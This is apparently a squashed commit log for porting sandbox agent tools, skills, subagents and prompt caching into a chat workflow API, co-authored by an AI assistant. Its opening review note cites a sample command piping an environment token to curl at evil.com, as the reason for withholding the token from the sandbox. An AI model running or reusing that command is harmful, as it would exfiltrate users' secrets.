command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port. - **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields. - P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above. - P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines. Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call. DRY by sharing one constant between the two chat endpoints: - New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety. - lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline. - app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`. Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family. Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585) * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5) Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing. New tool files (one tool per file, per sweetman SRP): - readFileTool.ts — read with 1-indexed offset/limit, numbered output - writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile - editFileTool.ts — exact-string replace, ambiguous-match rejection - grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200 - globTool.ts — find -printf with mtime sort, GNU/BSD-compatible - todoWriteTool.ts — stateless planning surface; echoes the list back - webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB New helpers (utilities used by multiple tools): - shellEscape.ts — `'` → `'\''` dance - toDisplayPath.ts — absolute → relative-when-inside-workdir display path buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR. Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers) Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing. Harmonized to direct-value exports across all 8 tools: - bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper. - buildAgentTools.ts: dropped the matching `()` calls. - 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly). Full suite 3014/3014 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587) * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project- level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty — so models in sandboxes without skills never see the tool. New skills layer (lib/skills/): - skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization) - parseSkillFrontmatter.ts — hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs) - extractSkillBody.ts — strip frontmatter, return body - substituteArguments.ts — $ARGUMENTS replacement - injectSkillDirectory.ts — prepend `Skill directory: <path>` - discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new - getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup, respects `disable-model-invocation`, surfaces available-skills list on unknown name. Loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, returns to the model. Wire-up: - AgentContext gains `skills?: SkillMetadata[]` - buildAgentTools accepts `{ skills }`, registers skill tool when non-empty - runAgentStep passes `agentContext.skills` to buildAgentTools - handleChatWorkflowStream connects sandbox + discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request) Slim scope decisions: - Project skills only (no global ~/.skills/ scan yet) - No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session). Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(skills): match open-agents 3-path scan (was scanning the wrong dir) The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/ — a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts): - \${workingDirectory}/.claude/skills/ (project, claude-style) - \${workingDirectory}/.agents/skills/ (project, agents-style) - \${HOME}/.agents/skills/ (global; populated at provisioning by installSessionGlobalSkills) Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands. Changes: - getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME — defaults to /root) - exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable - Handler awaits the async path resolution - New test suite covers all 3 paths + $HOME variants Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents — proving the slim deferral was wrong. Full suite 3053/3053; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback) Two changes per user direction: 1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup — org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array. 2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context-cast. Verified live on preview against \`recoupable/org-rostrum-pacific-...\` BEFORE this commit: - Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace) - Agent invoked \`skill({ skill: "recoup-api" })\` successfully, received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header Full suite 3055/3055; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite: - lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists) - lib/skills/getGlobalSkillsDirectory.ts — was inlined in getSandboxSkillDirectories.ts - 2 new unit tests (standard path, trailing-slash tolerance) discoverSkills now imports findSkillFile. getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file). Full suite passes; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589) * feat(chat-workflow): port task + ask_user_question composite tools (PR 7) Completes the open-agents tool surface. The agent now has all 11 tools. **ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) — client-side tool with NO server execute. Schema mirrors open-agents verbatim (questions array, options with label/description, multiSelect flag, max 12-char header). streamText halts after emitting the tool- call because there's no result to feed back; the chat UI renders the question component, collects answers, and submits them in the next workflow request's messages array. No WDK pause/resume hook needed. **task** (lib/agent/tools/taskTool.ts) — slim port of open-agents' multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub- `streamText` loop with a curated subagent tool set (`read, write, edit, grep, glob, bash`) matching open-agents' `executor` subagent. The subagent tool set deliberately EXCLUDES: - task (recursion guard — open-agents' three subagent types executor/explorer/design all explicitly omit task too; subagents are leaves of the agent tree) - ask_user_question, skill, todo_write, web_fetch (parity with open-agents subagent curation; subagents run autonomously, don't plan from scratch, don't make web calls, don't load further skills) AgentContext gains `modelId?: string` so the subagent can use the same model as its parent. Handler populates it from chat.model_id or the platform default. buildAgentTools registers both new tools unconditionally (skill stays conditional on a non-empty catalog). Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output) directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165 does. askUserQuestionTool uses the direct signature. Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools + AgentContext updates. Full suite 3075/3075 pass, lint clean, production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(task-tool): provide non-empty subagent prompt The subagent's streamText was invoked with messages: [] and only a system prompt, so the AI SDK recorded zero steps and threw NoOutputGeneratedError — surfaced to the parent as "Subagent failed: No output generated. Check the stream for errors." Pass an explicit user-side trigger prompt, mirroring open-agents' task tool. Adds a regression test that asserts streamText receives either a non-empty prompt or non-empty messages. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS) Address PR review feedback: - SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts (one exported function per file). - KISS: open-agents' AgentContext type does not have modelId — it uses model: LanguageModel / subagentModel?: LanguageModel. api can't follow that exact shape because agentContext is part of a durable Vercel Workflow input and LanguageModel objects aren't JSON-serializable. Instead of inventing modelId on AgentContext, hardcode a default subagent model id in taskTool. A subagentModelId override field can be added if/when a real consumer needs it. Also format-fixes askUserQuestionTool.ts toModelOutput arrow (parentheses around single param flagged by prettier in CI). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent): align AgentContext + model resolution with open-agents Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent inherits the parent's model (rather than the previous hardcoded SUBAGENT_MODEL_ID): - AgentContext gains `model: LanguageModel` (required) and `subagentModel?: LanguageModel`, mirroring open-agents. - Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel"> for the workflow input shape, since LanguageModel instances aren't JSON-serializable and can't ride durable Vercel Workflow inputs. - runAgentStep constructs `callModel = gateway(input.modelId)` once per step and merges it into experimental_context — same pattern as open-agents' prepareCall in open-harness-agent.ts. - New getMainModel / getSubagentModel helpers (SRP, one per file) mirror open-agents' utility functions: getSubagentModel returns `ctx.subagentModel ?? ctx.model`. - taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls getSubagentModel(experimental_context, "task") instead — subagent now defaults to the same model the parent is running. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592) * feat(chat-workflow): emit per-message cost/usage metadata (Bundle C) First step in the open-agents → api cutover sequence. Adds a messageMetadata callback to runAgentStep's toUIMessageStream call so the UI receives {modelId, lastStepUsage, totalMessageUsage, lastStepCost, totalMessageCost, stepFinishReasons} on every assistant turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte so sandbox.recoupable.com's model/cost badges keep working when cut over to /api/chat/workflow. New (SRP, one function per file): - lib/agent/messageMetadata/extractGatewayCost.ts — port of open-agents' gateway-metadata.ts, parses gateway-reported per-step cost from providerMetadata. - lib/agent/messageMetadata/addLanguageModelUsage.ts — port of open-agents' usage.ts, pointwise-sums LanguageModelUsage records. - lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring open-agents' WebAgentMessageMetadata. - lib/agent/messageMetadata/buildMessageMetadataCallback.ts — stateful factory returning a fresh callback per turn; accumulates usage + cost across finish-step parts. Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called this out as a known gap from the original workflow port (PR 4). Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage Address PR review feedback (one exported function per file) and adopt the user's preferred path of upgrading api's `ai` package rather than maintaining a normalization shim: - Extract addTokenCounts.ts (used by addLanguageModelUsage) - Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by extractGatewayCost) - Split AgentStepFinishMetadata into its own file (was co-located in AgentMessageMetadata) Upgrade the AI SDK so the wire format matches open-agents natively: - ai: 6.0.0-beta.122 → ^6.0.190 - @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai, @ai-sdk/mcp: all bumped to latest stable The new SDK's LanguageModelUsage is the flat shape (top-level `inputTokens` number + nested `inputTokenDetails`) — identical to open-agents' wire format. No conversion needed, so: - Delete normalizeUsage.ts + test (net -82 LOC) - Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage directly) Production code changes for the SDK upgrade: - runAgentStep + setupChatRequest: await convertToModelMessages (now returns Promise<ModelMessage[]>) Tests: 3106/3106 pass; production typecheck clean; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594) Convert taskTool.execute from `async () =>` to `async function*`, mirroring open-agents' `packages/agent/tools/task.ts`. Yields multiple chunks during the subagent run so the chat UI can render: - An initial "Subagent · 0 tools · 0 tokens" card with stable startedAt timestamp - A live `pending: {name, input}` indicator for each tool-call - Accumulated `usage` after each finish-step - A final `{final: ModelMessage[], ...}` chunk containing the full subagent transcript for expandable rendering `toModelOutput` mirrors open-agents' implementation: extracts the last assistant text part from `output.final` for inclusion in the parent agent's context. New (SRP, one function per file): - lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps addLanguageModelUsage to handle undefined inputs without introducing zero-tokens placeholders. Drive-by fix: askUserQuestionTool's `toModelOutput` signature was `(output) =>` from the older beta SDK era. The current SDK (ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to `({ output }) =>` so the function actually receives the user's answers at runtime — was previously falling through to the generic "User responded to questions." path. Tests updated to match. Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9 askUserQuestion); full suite 3114/3114 pass; lint clean. Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): thread real cwd + currentBranch into system prompt (cutover Bundle A.7) (#597) * feat(chat-workflow): thread real cwd + currentBranch into system prompt (Bundle A.7) Third open-agents → api cutover bundle. The handler hardcoded `workingDirectory: DEFAULT_WORKING_DIRECTORY` and never set `currentBranch`, so the agent had no environment info in its system prompt and had to run `pwd` / `git branch` on every turn. Production verification (today, before this fix): agent: "My system prompt does not contain working directory or branch information." After this fix the agent receives an Environment section + Current branch line + cloud-sandbox checkpointing block — same shape as open-agents (sandbox.recoupable.com) emits. Changes: - New `lib/chat/buildAgentSystemPrompt.ts` (SRP) — assembles environment section → Current branch → cloud-sandbox checkpointing → custom instructions, all conditional on inputs. Mirrors open-agents' `buildSystemPrompt` (packages/agent/system-prompt.ts). - New `lib/chat/cloudSandboxInstructions.ts` (SRP) — ports open-agents' `CLOUD_SANDBOX_INSTRUCTIONS` block with `{branch}` placeholder substitution. - `handleChatWorkflowStream`: connect the sandbox once for both skill discovery AND cwd/branch reading, then thread real values into `AgentContext.sandbox.workingDirectory` + `.currentBranch`. On connect failure, fall back to DEFAULT_WORKING_DIRECTORY (preserves today's behavior; tools surface real errors later when they reconnect). - `runAgentStep`: build the system prompt via `buildAgentSystemPrompt({cwd, currentBranch, customInstructions})` instead of using the static `agentCustomInstructions` directly. Scope reduced from the original "A.7+9" bundle: dropped contextLimit plumbing because it's a client-side display concern in open-agents, not server-side model routing (verified via grep — open-agents' server never reads context.contextLimit either). Tests: 7 new (6 buildAgentSystemPrompt + 1 runAgentStep wiring); full suite 3121/3121 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore(chat-workflow): drop currentBranch handling from system prompt Per direction: branch is always `main` (the default branch) in api's deployment topology, so the per-branch `Current branch: <name>` line and cloud-sandbox checkpointing block don't add information today. Strip the templating to keep the system prompt focused on what's load-bearing (the Environment section indicating workspace-relative paths). - Delete `lib/chat/cloudSandboxInstructions.ts` (was a port of open-agents' CLOUD_SANDBOX_INSTRUCTIONS, only useful with a real per-session branch) - Drop `currentBranch` from `buildAgentSystemPrompt` options + rendering - Stop reading `sandbox.currentBranch` in handleChatWorkflowStream (the field stays on AgentContext.sandbox for type completeness; also consumed by createSandboxHandler unchanged) - Remove branch-related test cases Can be re-added later if/when meaningful per-session branches (e.g. xx/abcdef12 generated branches) land. Tests: 3119/3119 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(chat-workflow): drop stale currentBranch arg from buildAgentSystemPrompt call Build failure on bf1e245 — runAgentStep was still passing `currentBranch: input.agentContext.sandbox.currentBranch` after buildAgentSystemPrompt's option was removed. Stripping it. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): Anthropic prompt cache control (Bundle A.6) (#599) Fourth open-agents → api cutover bundle. runAgentStep was sending the same system prompt + tool definitions on every turn as fresh input, even though Anthropic prompt caching can shave 90% off subsequent input cost. Production traces showed `cacheReadTokens: 0` on every api turn, while open-agents shows cacheRead matching cacheWrite from the prior turn — i.e. open-agents reuses the cached prefix. Changes (SRP — one function per file): - `lib/agent/contextManagement/isAnthropicModel.ts` — predicate port of open-agents' `packages/agent/context-management/cache-control.ts:5`. - `lib/agent/contextManagement/addCacheControlToTools.ts` — marks the LAST tool with `cacheControl: { type: "ephemeral" }`. Last-only conserves Anthropic's 4-breakpoint limit. - `lib/agent/contextManagement/addCacheControlToMessages.ts` — marks the LAST message with `cacheControl` on every step, per Anthropic's "mark the final block of the final message" guidance. `runAgentStep` now: - Wraps the tool set via `addCacheControlToTools(...)` before passing to streamText (static — set once per step). - Adds a `prepareStep` callback that wraps `messages` via `addCacheControlToMessages(...)` on every internal model call. Production behavior reproducer (Haiku 4.5, identical 2-turn prompt to both backends): api prod (broken): turn1 cacheWrite=0 cacheRead=0 cost=$0.005952 turn2 cacheWrite=0 cacheRead=0 cost=$0.005959 → flat cost; full input billed every turn. open-agents prod: turn1 cacheWrite=10966 cacheRead=0 turn2 cacheWrite=12 cacheRead=10966 cost drops 12x → near-full prefix re-read from cache on turn 2. After this PR, api should match open-agents' caching curve. Tests: 19 new (7 isAnthropicModel + 5 addCacheControlToTools + 5 addCacheControlToMessages + 2 runAgentStep wiring assertions); full suite 3138/3138 pass; lint clean. Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

…ver bundle (#602) * feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub-<uuid> header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f65) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones (`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. What's now plumbed end-to-end: - validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header New helpers (Supabase): - compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id - touchChat — bump chats.updated_at - updateChat — generic partial update mirroring updateSession's shape - createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert - isFirstChatMessage — true iff exactly one row exists matching messageId New helpers (chat/recoupable): - extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased) - agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt - persistLatestUserMessage — fire-and-forget user msg + title-from-first-80 - reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop New workflow files: - app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper - app/workflows/runAgentStep.ts — `"use step"`, single streamText turn Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean. Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — structural + P1/P2 fixes Sweetman structural feedback (KISS / OCP): - Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts - Generic Supabase helpers + domain wrappers: - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted). - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs. - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors. - Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently). cubic P1 fixes: - CAS-before-start: handler now claims `active_stream_id` with a `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id. - updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors. - reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error). - await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch. cubic P2 fixes: - updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at). - persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix. - runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure. - runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit. Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): top-level import in reconcileExistingActiveStream The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency. Also tightens the cancel-throws handler test to use the same deferred- rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): move active_stream_id CAS out of supabase lib Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured: - `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial<Tables<"chats">>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib. - `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result. Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline. - Handler + reconcile updated to use the wrapper. Tests follow. 37/37 tests in touched files pass; full suite 2955/2955; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR). 1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks. 2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...) .update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder). Both bugs were behavior-neutral — the function shape and contract are unchanged. 37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583) * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim) 